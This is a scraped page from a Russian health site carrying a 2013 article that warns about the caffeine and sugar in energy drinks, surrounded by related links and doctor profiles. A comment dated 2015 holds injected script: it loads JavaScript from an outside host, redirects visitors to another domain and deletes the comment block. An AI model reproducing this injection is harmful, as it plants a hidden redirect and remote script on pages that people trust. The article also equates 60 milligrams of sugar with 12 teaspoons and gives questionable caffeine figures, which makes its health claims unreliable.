Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Смертельные энергетически...  >>  Смертельные энергетические напитки
 
Обратная связь
 

Смертельные энергетические напитки

Размер шрифта
25 февраля 2013 00:00
  • google_analytics: false
  • Нравится

Энергетические напитки сейчас можно купить в любом магазине совершенно спокойно. Но медицинское сообщество всего мира бьет тревогу, сообщается о смертельных исходах после употребления энергетических напитков.

смертельные энергетические напитки

Если вы возьмете банку с напитком и внимательно прочитаете, вы будете удивлены, ведь перечень противопоказаний на этикетке не меньше, чем в лекарственном препарате. Давайте разберемся, что же делает этот напиток таким энергетическим и в то же время таким опасным.

Почему же энергетики такие вредные

Кофеин, известное всем вещество, которое помогает нам бороться с сонливостью и усталостью, стимулирует мозговую деятельность. Суточная доза для взрослого человека 400 миллиграмм, а для подростка не должна превышать 100 миллиграмм. Для сравнения: в одной банке энергетического напитка содержится примерно 240 миллиграмм кофеина, что почти в два с половиной раза превышает норму этого вещества для подростков.

Что же происходит с организмом, когда он получает повышенную дозу кофеина? Возникает передозировка, сходная с той, что возникает, если выпить повышенную дозу лекарств.

Основные симптомы передозировки кофеином

  • Учащенное сердцебиение
  • Повышение артериального давления
  • Учащенное  мочеиспускание
  • Дрожь в руках
  • Многократная рвота
  • Понос
  • Потеря сознания

При возникновении данных симптомов необходимо немедленно вызвать скорую помощь, любое промедление может привести к гибели.

Многие люди употребляют энергетические напитки в надежде похудеть, но в одной банке содержится 60 миллиграмм сахара, что равносильно 12 чайным ложкам.

Вне закона

Самое печальное состоит в том, что производитель предупреждает нас о возможных последствиях для здоровья, но мы, в силу своей невнимательности, не читаем эти предупреждения и сами покупаем эти напитки себе и своим детям.

Мы надеемся, что в скором будущем будет одобрен закон, запрещающий продажу энергетических напитков несовершеннолетним детям.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:23

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Что здоровее: кофе молотый и растворимый   Врет ли ваш тонометр? Ошибки, которые повышают показатели давления   Кофе поможет похудеть! Сколько и как пить?   Всего один напиток спасет вас от всех болезней!  
23 апреля 2013Выпали зубы – у вас болезнь сердца! 27 августа 2012Лекарство от рака ищите в обычном кафе!
 
03 февраля 2012Кофе снижает риск фиброза 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 

Слайдшоу

1
Тесты, которые должен сделать каждый мужчина. Часть 1
Как похудеть, ничего не делая
10 причин напиться

Тесты

1
Грозит ли вам инфаркт миокарда?
Кофеин вызывает зависимость?
Какое мороженное съесть, чтобы похудеть
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.